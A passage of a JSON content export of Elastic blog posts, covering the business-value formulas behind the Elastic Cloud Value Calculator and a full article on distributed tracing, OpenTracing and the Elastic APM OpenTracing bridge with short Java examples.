have a handle on, and we've made some simple assumptions for you if you choose this situation. Keep in mind that we generally apply this situation, conservatively, towards consumer-facing search use cases. For example, what would it mean if you are a retailer and your search stops working, and what is the cost of that possible outage? These are all risks that need to be considered and mitigated.\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eReduce risk of lost revenue due to unplanned downtime:\u003c/strong\u003e\u003c/p\u003e\u003cp\u003eAnnual number of downtime hours (assume 44, or 99.5% uptime) * $25,000 per downtime hour * 90% reduction in downtime hours\u003c/p\u003e\u003cp\u003eNote:\u0026nbsp;This improvement factor assumes an increase from 99.5% uptime to 99.95% uptime, an improvement of 90% as a starting point.\u003c/p\u003e\u003ch3\u003e\u003cstrong\u003eReduced risk of SLA violation\u003c/strong\u003e\u003c/h3\u003e\u003cp\u003eThis particular calculation is equally specific as the last one. The assumption is that you have embedded search or a related intelligence use case into a business customer-facing application. What’s the risk of your application experiencing instability that we can help you mitigate? And if your service-related search or lookup capability is down, will your end users claim they are experiencing an SLA violation? Anyone who's worked on a support contract knows how important these considerations are.\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eReduce risk of SLA violation:\u003c/strong\u003e\u003c/p\u003e\u003cp\u003eAnnual SLA penalty events (we assume 1 to start) * [# of customers impacted by an SLA penalty event * average annual revenue per business customer * % of business customer revenue refunded due to penalty event (15% seeded)] * 20% reduction SLA penalty risk\u003c/p\u003e\u003ch2\u003eSecurity, risk, and compliance\u003c/h2\u003e\u003cp\u003eFor these calculations, we don’t expose any inputs. Generally, this is an acknowledgement of the risk associated with running Elastic without the right security and compliance protocols in place. There is a very good reason to include these benefit calculations, even if your individual risk is marginally low. One must accept the fact that, without the right security setup — which comes standard with Elastic Cloud — Elastic users incur risk of collecting data and exposing that data. Sure, it can be cool to “move fast and break things,” but it isn’t sustainable in the long term when you take into account security and compliance concerns.\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eReduce cost of creating compliant solutions:\u003c/strong\u003e\u003c/p\u003e\u003cp\u003eNumber of compliant solutions required (assumes 1) * cost per compliance solution (assumes $25,000) * 100% reduction in cost of creating and maintaining a compliance solution\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eReduce risk of data breach through use of access controls:\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e[Risk of data breach in scope 1.2% (24% risk of data breach caused by human error: IBM research) * 5% chance of data breach associated with Elastic (vs other datastores)] * average cost per data breach (used industry benchmark from IBM of $8.1M) * 95% reduction in risk of data breach through use of access controls\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eReduce risk of downtime for regulated services:\u003c/strong\u003e\u003c/p\u003e\u003cp\u003eDowntime instances leading to regulatory violations (assumes 1) * average fine for regulated services (assumes $10,000) * 90% reduction in downtime\u003c/p\u003e\u003cp\u003eThese assumptions are similar to the reduced risk of downtime noted in the revenue and employee disruption risk section above.\u003c/p\u003e\u003ch2\u003eFind out how much you can save or gain\u003c/h2\u003e\u003cp\u003eNow that you know how all these calculations work, we encourage you to try the \u003ca href=\"https://www.elastic.co/cloud/value-calculator\"\u003eElastic Cloud Value Calculator\u003c/a\u003e yourself. When you download the output file from our value calculator, keep in mind that we include not only the one-year benefit results, but also the three-year results. We also assume 10% year-over-year growth with these value calculations. Generally speaking, our users and customers see quite a bit more growth than this annually, so we believe this is a conservative estimate of your growth potential.\u003c/p\u003e\u003cp\u003eFinally, a few parting thoughts:\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eExperiment with the calculator.\u003c/strong\u003e Play around with the factors and numbers to develop a more custom business case tailored to your needs.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eTake the numbers further.\u003c/strong\u003e There are downstream impacts from the benefit calculations that you can explore outside of the calculator. Some of these are specific to your needs and can't be added to a standardized tool.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eHelp us make the calculator better. \u003c/strong\u003eGive us feedback on how to improve it to represent the value you accrue with your use of Elastic Cloud. If at any point you have feedback on this tool, please email \u003ca href=\"mailto:value-calculator@elastic.co\"\u003evalue-calculator@elastic.co\u003c/a\u003e.\u003c/li\u003e\u003c/ul\u003e","callout":[],"category":[{"_version":5,"locale":"en-us","uid":"blt0c9f31df4f2a7a2b","ACL":{},"created_at":"2018-08-27T12:32:48.561Z","created_by":"sys_blt57a423112de8a853","key":"company-news","label_l10n":"News","tags":[],"title":"News","updated_at":"2024-05-10T13:44:22.885Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-29T20:00:07.956Z","user":"blt27204bf9f7abb7fd"}}],"created_at":"2021-03-11T15:57:00.314Z","created_by":"bltf6ab93733e4e3a73","disclaimer":[],"full_bleed_image":{"_version":2,"is_dir":false,"uid":"bltf40a9f5043e57593","ACL":{},"content_type":"image/jpeg","created_at":"2020-03-23T14:06:21.568Z","created_by":"bltea6cbb86fea188be","description":"","file_size":"161073","filename":"blog-banner-magnifying-glass-money-bag.jpg","parent_uid":null,"tags":[],"title":"blog-banner-magnifying-glass-money-bag.jpg","updated_at":"2020-11-25T19:06:55.518Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-11-25T19:07:08.587Z","user":"bltf6ab93733e4e3a73"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf40a9f5043e57593/5fbeab4f72a3526f28dbf39c/blog-banner-magnifying-glass-money-bag.jpg"},"markdown_l10n":"","publish_date":"2021-03-15T19:00:00.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"A deep dive into the Elastic Cloud Value Calculator calculations and assumptions. Use it to understand the details behind each benefit group, or leverage it to create your own version custom to your situation.","noindex":false,"canonical_tag":""},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"title":"Optimizing","label_l10n":"Optimizing","keyword":"optimizing","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt7731091cfa6e23e8","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:40:15.070Z","updated_at":"2020-06-17T03:40:15.070Z","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:40:15.069Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-01-07T18:03:51.089Z","user":"blt36e890d06c5ec32c"}}],"tags_use_case":[],"thumbnail_image":{"_version":2,"is_dir":false,"uid":"bltd81686b4eca90556","ACL":{},"content_type":"image/jpeg","created_at":"2020-03-23T14:06:14.538Z","created_by":"bltea6cbb86fea188be","description":"","file_size":"101447","filename":"blog-thumb-magnifying-glass-money-bag.jpg","parent_uid":null,"tags":[],"title":"blog-thumb-magnifying-glass-money-bag.jpg","updated_at":"2020-11-25T19:07:08.917Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-11-25T19:07:23.542Z","user":"bltf6ab93733e4e3a73"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd81686b4eca90556/5fbeab5c4a4abb73ff7a15f1/blog-thumb-magnifying-glass-money-bag.jpg"},"title":"Elastic Cloud Value Calculator: Understand the business value of Elastic Cloud","title_l10n":"Elastic Cloud Value Calculator: Understand the business value of Elastic Cloud","updated_at":"2024-10-28T21:11:52.534Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/elastic-cloud-value-calculator-understand-the-economics-of-adopting-elastic-cloud","publish_details":{"time":"2024-10-28T21:11:56.979Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt728b13a654ab2609","_version":7,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blt54cbb3c8904457dd"],"body_l10n":"\u003ch2\u003eThe World of Microservices\u003c/h2\u003e\u003cp\u003eEnterprises are increasingly adopting microservice architectures. They are developing and deploying more microservices everyday. Often, these services are developed in different programming languages, deployed into separate runtime containers, and managed by different teams and organizations. Large enterprises like Twitter can have tens of thousands of microservices, all working together to achieve their business goals. As they discussed \u003ca href=\"https://blog.twitter.com/engineering/en_us/a/2013/observability-at-twitter.html\"\u003ein this Twitter blog post\u003c/a\u003e, visibility into the health and performance of the diverse service topology is extremely important for them to be able to quickly determine the root cause of issues, as well as increasing Twitter’s overall reliability and efficiency.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf0ee6529c2de5c59/5c98d620026179ca592ee24d/blog-opentracing-elastic-apm-1.png\" data-sys-asset-uid=\"bltf0ee6529c2de5c59\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eThis is where \u003cem\u003e\u003cstrong\u003eDistributed Tracing\u003c/strong\u003e\u003c/em\u003e can really help. Distributed Tracing helps with two fundamental challenges faced by microservices:\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cstrong\u003eLatency tracking\u003c/strong\u003e\u003cbr /\u003eOne user request or transaction can travel through many different services in different runtime environments. Understanding the latency of each of these services for a particular request is critical to the understanding of the overall performance characteristics of the system as a whole, and provides valuable insight for possible improvements.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eRoot cause analysis\u003c/strong\u003e\u003cbr /\u003eRoot cause analysis is even more challenging for applications that build on top of large ecosystems of microservices. Anything can go wrong with any of the services at any time. Distributed tracing is of crucial importance when debugging issues in such a system.\u003c/li\u003e\u003c/ol\u003e\u003cp\u003eTake a step back, \u003cem\u003e\u003cstrong\u003etracing\u003c/strong\u003e\u003c/em\u003e is only one piece of the puzzles of the \u003ca href=\"/blog/observability-with-the-elastic-stack\"\u003eThree Pillars of Observability\u003c/a\u003e - Logging, Metrics and Tracing. As we will discuss briefly, Elastic Stack is a unified platform for all three pillars of observability. When logs, metrics, and \u003ca href=\"https://www.elastic.co/observability/application-performance-monitoring\" target=\"_self\"\u003eAPM\u003c/a\u003e data are stored in the same repository, analyzed, and correlated together, you gain the most context-rich insight into your business applications and systems. In this blog, we will solely focus on the tracing aspect.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd249957e822769f9/5c98d61beb3c40e859703c1a/blog-opentracing-elastic-apm-2.png\" data-sys-asset-uid=\"bltd249957e822769f9\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003ch2\u003eDistributed Tracing with Elastic APM\u003c/h2\u003e\u003cp\u003e\u003ca href=\"/guide/en/apm/get-started/current/index.html\"\u003eElastic APM\u003c/a\u003e is an application performance monitoring system built on the Elastic Stack. It allows you to monitor software services and applications in real time, collecting detailed performance information on response time for incoming requests, database queries, calls to caches, external HTTP requests, etc. Elastic APM agents offer rich auto-instrumentation out of the box (e.g. timing db queries, etc.) for supported frameworks and technologies. You can also use custom instrumentation for custom purposes. This makes it much easier to pinpoint and fix performance problems quickly.\u003c/p\u003e\u003cp\u003eElastic APM supports \u003ca href=\"/guide/en/apm/get-started/6.6/distributed-tracing.html\"\u003edistributed tracing\u003c/a\u003e and is OpenTracing compliant. It enables you to analyze performance throughout your microservice architecture all in one view. Elastic APM accomplishes this by tracing all of the requests, from the initial web request to your front-end service, to queries made to your back-end services. This makes finding possible bottlenecks throughout your application much easier and faster. The Timeline visualization in APM UI shows a waterfall view of all of the transactions from individual services that are connected in a trace:\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta65f095d22517ce4/5c98d59849a201165fca1042/blog-opentracing-elastic-apm-3.png\" data-sys-asset-uid=\"blta65f095d22517ce4\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eElastic Stack is also a great platform for log aggregation and metrics analytics. Having logs, metrics, and APM traces all stored and indexed in Elasticsearch is super powerful. Being able to quickly correlate data sources like infrastructure metrics, logs and traces enables you to debug the root cause much faster. In the APM UI, when looking at a trace, you can quickly jump to the host or container metrics and logs by clicking the \u003cstrong\u003eActions\u003c/strong\u003e menu, if these metrics and logs are also collected.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc037c8e3109bfba5/5c98d60b6d10d1145a98468c/blog-opentracing-elastic-apm-4.png\" data-sys-asset-uid=\"bltc037c8e3109bfba5\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eIt would\u0026nbsp;be wonderful if everybody was\u0026nbsp;using Elastic APM to instrument their applications and services. However, Elastic APM is not the only distributed tracing solution available today. There are other popular open source tracers like Zipkin and Jaeger. Concepts like polyglot programming and polyglot persistence are well known and well accepted in the world of microservices. Similarly, “\u003cstrong\u003epolyglot tracing\u003c/strong\u003e” is going to be more common than not. Because of the independent and decoupled nature of microservices, people responsible for different services will likely use different tracing systems.\u003c/p\u003e\u003ch2\u003eChallenges for Developers\u003c/h2\u003e\u003cp\u003eWith many different tracing systems available, developers are faced with real challenges. At the end of the day, tracers live inside the application code. Some common challenges are:\u003c/p\u003e\u003col\u003e\u003cli\u003eWhich tracing system to use?\u003c/li\u003e\u003cli\u003eWhat if I want to change my tracer? I don’t want to change my entire source code.\u003c/li\u003e\u003cli\u003eWhat do I do with shared libraries that might be using different tracers?\u003c/li\u003e\u003cli\u003eWhat if my third-party services use different tracers?\u003c/li\u003e\u003c/ol\u003e\u003cp\u003eNot surprisingly, we need standardization to address these concerns. Before discussing where we are with the standardization, let’s take a step back and look at distributed tracing from an architectural perspective in a holistic manner and understand what’s required to achieve the distributed tracing “nirvana”.\u003c/p\u003e\u003ch2\u003eArchitectural Components of Distributed Tracing\u003c/h2\u003e\u003cp\u003eModern software systems can be broken down into a few high-level components, typically designed and developed by different organizations and run in different runtime environments.\u003c/p\u003e\u003cul\u003e\u003cli\u003eYour own application code and services\u003c/li\u003e\u003cli\u003eShared libraries and services\u003c/li\u003e\u003cli\u003eExternal services\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eTo monitor such a system in a holistic and integrated fashion with distributed tracing, we need four architectural components:\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1a2bddd007f963ac/5c98d60367b8321d593d7fb4/blog-opentracing-elastic-apm-5.png\" data-sys-asset-uid=\"blt1a2bddd007f963ac\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cstrong\u003eStandardized distributed tracing API\u003c/strong\u003e. A standardized vendor-neutral tracing API allows developers to instrument their code in a standardized way, does not matter what tracer they might choose to use later during the runtime. This is the first step towards anything.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eStandardized tracing context definition and propagation\u003c/strong\u003e. For a trace to go across from one runtime to another, the tracing context has to be understood by both parties, and there has to be a standard way of propagating that context. At the minimum, the context carries a trace ID.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eStandardized tracing data definition\u003c/strong\u003e. For trace data from one tracer to be understood and consumed by another tracer there has to be a standardized and extensible format for it.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eInteroperable tracers\u003c/strong\u003e. Finally, to achieve 100% runtime compatibility, different tracers have to provide mechanisms for them to both export and import trace data from other tracers in an open way. Ideally, a shared library or service instrumented by a tracer like Jaeger should be able to have it’s tracing data sent directly to Elastic APM or another tracer via the Jaeger agent through a configuration change.\u003c/li\u003e\u003c/ol\u003e\u003cp\u003eNow, enter OpenTracing.\u003c/p\u003e\u003ch2\u003eThe OpenTracing Specification\u003c/h2\u003e\u003cp\u003eThe OpenTracing \u003ca href=\"https://opentracing.io/specification/\"\u003especification\u003c/a\u003e defines an open, vendor-neutral API for distributed tracing. It enables users to avoid vendor lock-in by allowing them to switch the OpenTracing implementer at any time. It also enables developers of frameworks and shared libraries to provide tracing functionality out of the box, in a standard fashion to enable better insights into the frameworks and libraries. Web-scale companies like Uber and Yelp are using OpenTracing to get deeper visibility into their highly distributed and dynamic applications.\u003c/p\u003e\u003ch3\u003eThe OpenTracing Data Model\u003c/h3\u003e\u003cp\u003eBasic concepts of OpenTracing and the fundamental \u003ca href=\"https://opentracing.io/docs/overview/\"\u003edata model\u003c/a\u003e came from Google’s Dapper paper. Key concepts include trace and span.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf922d3d931f16598/5c98d5fcd3c73ef55e9ea9c2/blog-opentracing-elastic-apm-6.png\" data-sys-asset-uid=\"bltf922d3d931f16598\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003eA \u003cstrong\u003etrace\u003c/strong\u003e represents a transaction as it moves through a distributed system. It can be thought of as a directed acyclic graph of Spans.\u003c/li\u003e\u003cli\u003eA \u003cstrong\u003espan\u003c/strong\u003e represents a logical unit of work that has a name, start time, and duration. Spans may be nested and ordered to model relationships. Spans accept key:value tags as well as fine-grained, time-stamped, structured logs attached to the particular span instance.\u003c/li\u003e\u003cli\u003eTrace \u003cstrong\u003econtext\u003c/strong\u003e is the trace information that accompanies the distributed transaction, including when it passes the service to service over the network or through a message bus. The context contains the trace identifier, span identifier, and any other data that the tracing system needs to propagate to the downstream service.\u003c/li\u003e\u003c/ol\u003e\u003ch3\u003eHow does it all fit in?\u003c/h3\u003e\u003cp\u003eIdeally, with standardization, tracing information from custom application code, shared libraries, and shared services developed and run by different organizations are exchangeable and runtime compatible, does not matter what tracer each of these components chose to use.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc509fc1ff327a7bd/5c98d5f7228f2c42594171f4/blog-opentracing-elastic-apm-7.png\" data-sys-asset-uid=\"bltc509fc1ff327a7bd\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eHowever, OpenTracing only addresses the first of the four architectural components we discussed before. So, where are we today with other components and what the future holds for us?\u003c/p\u003e\u003ch3\u003eWhere are We Today?\u003c/h3\u003e\u003cp\u003eAs we discussed, OpenTracing defines a standard set of tracing APIs for different tracers to implement, which is a great start and very encouraging. However, we still need tracing context standardization and tracing data standardization for them to be compatible and exchangeable with each other.\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cstrong\u003eOpenTracing API provides a standard set of APIs\u003c/strong\u003e. This is pretty much the only standardization we have as of today. There is limitation to the specification too. For example, it does not cover all the programming languages. Nevertheless, it’s a wonderful effort and gaining great traction.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eNo standardized tracing context definition yet\u003c/strong\u003e. The \u003ca href=\"https://www.w3.org/2018/distributed-tracing/\"\u003eW3C Distributed Tracing Work Group\u003c/a\u003e is in the process of standardizing the tracing context definition - the W3C \u003ca href=\"https://www.w3.org/TR/trace-context/\"\u003eTrace Context specification\u003c/a\u003e. The specification defines a unified approach to context and event correlation within distributed systems, and will enable end-to-end transaction tracing within distributed applications across different monitoring tools. Elastic APM supports the W3C Trace Context working group's effort to standardize the HTTP header format for distributed tracing. Our agent implementations closely follow the Trace Context draft specification, and we intend to fully support the final specification.\u003cbr /\u003e\u003cbr /\u003eAs an example of the incompatibility of the tracing context today, here is an example of the HTTP header used by Elastic APM and Jaeger for trace ID. As you can see, both the name and encoding of the ID are different. When different tracing headers are used, traces will break when they cross the boundaries of the respective tracing tools.\u003cbr /\u003e\u003cbr /\u003eJaeger:\u003cbr /\u003e\u003cstrong\u003euber-trace-id\u003c/strong\u003e: 118c6c15301b9b3b3:56e66177e6e55a91:18c6c15301b9b3b3:1\u003cbr /\u003e\u003cbr /\u003eElastic APM:\u003cbr /\u003e\u003cstrong\u003eelastic-apm-traceparent\u003c/strong\u003e: 00-f109f092a7d869fb4615784bacefcfd7-5bf936f4fcde3af0-01\u003cbr /\u003e\u003cbr /\u003eThere are other challenges too, other than the definition itself. For example, not all HTTP headers are automatically forwarded by service infrastructure and routers etc. Whenever headers are dropped, the trace will break.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eNo standardized tracing data definition yet\u003c/strong\u003e. As stated by the W3C Distributed Tracing Work Group, the second piece of the puzzle for trace interoperability is “a standardized and extensible format to share trace data -- full traces or fragments of traces -- across tools for further interpretation”. As you can imagine, with many open source and commercial players involved, agreeing on a standard format is not an easy thing. Hopefully we will get there soon.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eTracers are not runtime-compatible\u003c/strong\u003e. Because of everything we discussed above, plus mixed motivation of making their system open and compatible with the rest of the world, tracers are simply not compatible with each other during the runtime today. I can confidently say that it will probably be that way for the foreseeable future.\u003c/li\u003e\u003c/ol\u003e\u003ch2\u003eHow Elastic APM Works with Other Tracers Today\u003c/h2\u003e\u003cp\u003eEven though we are not even close to 100% compatibility among tracers yet today, there is no need to be discouraged. Elastic Stack can still work with other tracers in a couple of different ways.\u003c/p\u003e\u003col\u003e\u003cli\u003eElasticsearch as the \u003cstrong\u003escalable backend data store\u003c/strong\u003e for other tracers.\u003cbr /\u003e\u003cbr /\u003eNot surprisingly, Elasticsearch has been used as the backend data store for other tracers like Zipkin and Jaeger, due to its massive scalability and rich analytics capabilities. Shipping Zipkin or Jaeger tracing data into Elasticsearch is a simple configuration for both of them. Once the tracing data is inside Elasticsearch, you can use the powerful analytic and visualization capability of Kibana to analyze your tracing information and create eye-catching visualizations that provide deep insight into your application performance.\u003c/li\u003e\u003cli\u003eElastic \u003cstrong\u003eOpenTracing Bridge\u003c/strong\u003e\u003cbr /\u003e\u003cbr /\u003eThe Elastic APM OpenTracing bridge allows you to create Elastic APM Transactions and Spans, using the OpenTracing API. In other words, it translates the calls to the OpenTracing API to Elastic APM and thus allows for reusing existing instrumentation. For example, an existing instrumentation done by Jaeger can be simply replaced with Elastic APM by changing a couple of lines of code.\u003cbr /\u003e\u003cbr /\u003eOriginal instrumentation by Jaeger:\u003cbr /\u003e\u003cbr /\u003e\u003cpre class=\"prettyprint\"\u003eimport io.opentracing.Scope;\u003cbr /\u003eimport io.opentracing.Tracer;\u003cbr /\u003eimport io.jaegertracing.Configuration;\u003cbr /\u003eimport io.jaegertracing.internal.JaegerTracer;\u003cbr /\u003e...\u003cbr /\u003eprivate void sayHello(String helloTo) {\u003cbr /\u003e Configuration config = ...\u003cbr /\u003e Tracer tracer = config.getTracer();\u003cbr /\u003e try (Scope scope = tracer.buildSpan(\"say-hello\").startActive(true)) {\u003cbr /\u003e scope.span().setTag(\"hello-to\", helloTo);\u003cbr /\u003e }\u003cbr /\u003e ...\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003eReplace Jaeger with Elastic OpenTracing bridge:\u003cbr /\u003e\u003cbr /\u003e\u003cpre class=\"prettyprint\"\u003eimport io.opentracing.Scope;\u003cbr /\u003eimport io.opentracing.Tracer;\u003cbr /\u003eimport co.elastic.apm.opentracing.ElasticApmTracer;\u003cbr /\u003e...\u003cbr /\u003eprivate void sayHello(String helloTo) {\u003cbr /\u003e Tracer tracer = new ElasticApmTracer();\u003cbr /\u003e try (Scope scope = tracer.buildSpan(\"say-hello\").startActive(true)) {\u003cbr /\u003e scope.span().setTag(\"hello-to\", helloTo);\u003cbr /\u003e }\u003cbr /\u003e ...\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cbr /\u003e\u003cbr /\u003eWith this simple change, the tracing data will be happily flowing into Elastic APM, without you having to modify other tracing code. That’s the power of OpenTracing!\u003c/li\u003e\u003c/ol\u003e\u003ch2\u003eElastic APM Real User Monitoring\u003c/h2\u003e\u003cp\u003eWhile we mostly focus on the backend services when discussing tracing and context propagation etc., there is great value to start the trace on the client side in the browser. When doing so, you get trace information the moment a user clicks on something in the browser. That trace information represents the “real user experience” of your applications from performance aspect. Unfortunately again, there is no standardized way of forwarding that information today. The W3C group does intend to extend the trace context all the way to the browser in the future.\u003c/p\u003e\u003cp\u003e\u003ca href=\"/guide/en/apm/server/current/rum.html\"\u003eElastic APM Real User Monitoring\u003c/a\u003e (RUM) provides exactly that functionality today. The RUM JS agent monitors the real user experience within your client-side application. You will be able to measure metrics such as \"Time to First Byte\", domInteractive, and domComplete which helps you discover performance issues within your client-side application as well as issues that relate to the latency of your server-side application. Our RUM JS agent is framework-agnostic which means that it can be used with any JavaScript-based frontend application.\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/blte4644a6aaae06c70/5c645a55e2c86a6c4191bfe1/download\" data-sys-asset-uid=\"blte4644a6aaae06c70\"/\u003e\u003c/p\u003e\u003ch2\u003eSummary\u003c/h2\u003e\u003cp\u003eHopefully, this blog helped you understand the landscape of Distributed Tracing a bit better and clarified some of the confusions about where we are with OpenTracing today. Let’s call it a wrap with a brief summary:\u003c/p\u003e\u003col\u003e\u003cli\u003eDistributed tracing provides invaluable performance insight for microservices.\u003c/li\u003e\u003cli\u003eOpenTracing is the industry’s first step towards standardization for distributed tracing. We still have a long way to go for full compatibility.\u003c/li\u003e\u003cli\u003eElastic APM is OpenTracing compliant.\u003c/li\u003e\u003cli\u003eElastic OpenTracing bridge allows instrumentation reuse.\u003c/li\u003e\u003cli\u003eElastic Stack is a great scalable long-term storage for other tracers like Zipkin and Jaeger, even without full runtime compatibility today.\u003c/li\u003e\u003cli\u003eElastic provides rich analytics for tracing data Elastic or not. Shipping Zipkin or Jaeger tracing data into Elasticsearch is a simple configuration.\u003c/li\u003e\u003cli\u003eElastic APM \u003ca href=\"https://www.elastic.co/observability/real-user-monitoring\" target=\"_self\"\u003eReal User Monitoring\u003c/a\u003e (RUM) monitors the real user experience within your client-side application.\u003c/li\u003e\u003cli\u003eAll-in-all, Elastic is a massively scalable, feature-rich, and unified analytics platform for all three pillars of observability - logging, metrics \u0026amp; tracing.\u003c/li\u003e\u003c/ol\u003e\u003cp\u003eAs always, reach out on the \u003ca href=\"https://discuss.elastic.co/c/apm\"\u003eElastic APM forum\u003c/a\u003e if you want to open up a discussion or have any questions. Happy tracing!\u003c/p\u003e","callout":[],"category":[{"uid":"bltb79594af7c5b4199","_version":3,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:05.640Z","created_by":"blt3044324473ef223b70bc674c","key":"product","label_l10n":"Product","tags":[],"title":"Product","updated_at":"2024-05-10T13:44:20.209Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.527Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-18T15:10:05.538Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":{"title":"elastic-apm-distributed-tracing-large.jpg","uid":"bltaaf9d94ea011ca66","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-03-25T13:22:53.470Z","updated_at":"2019-03-25T13:22:53.470Z","content_type":"image/jpeg","file_size":"161628","filename":"elastic-apm-distributed-tracing-large.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-18T14:04:23.929Z","user":"sys_blt57a423112de8a853"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltaaf9d94ea011ca66/5c98d62d55e02a1e5a5e9b0c/elastic-apm-distributed-tracing-large.jpg"},"markdown_l10n":"","publish_date":"2019-02-19T16:00:00.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"OpenTracing defines a vendor-neutral API for distributed tracing. Elastic APM is OpenTracing compliant and provides a bridge for instrumentation reuse.","canonical_tag":"","noindex":false},"tags":["newsletter"],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"_version":1,"locale":"en-us","uid":"blt76a8a9e2ae891569","ACL":{},"created_at":"2023-11-06T21:35:06.844Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"tracing","label_l10n":"Tracing","tags":[],"title":"Tracing","updated_at":"2023-11-06T21:35:06.844Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.748Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"title":"elastic-apm-distributed-tracing-small.png","uid":"blt1463e5e2ef1cadd0","created_by":"sys_blt57a423112de8a853","updated_by":"sy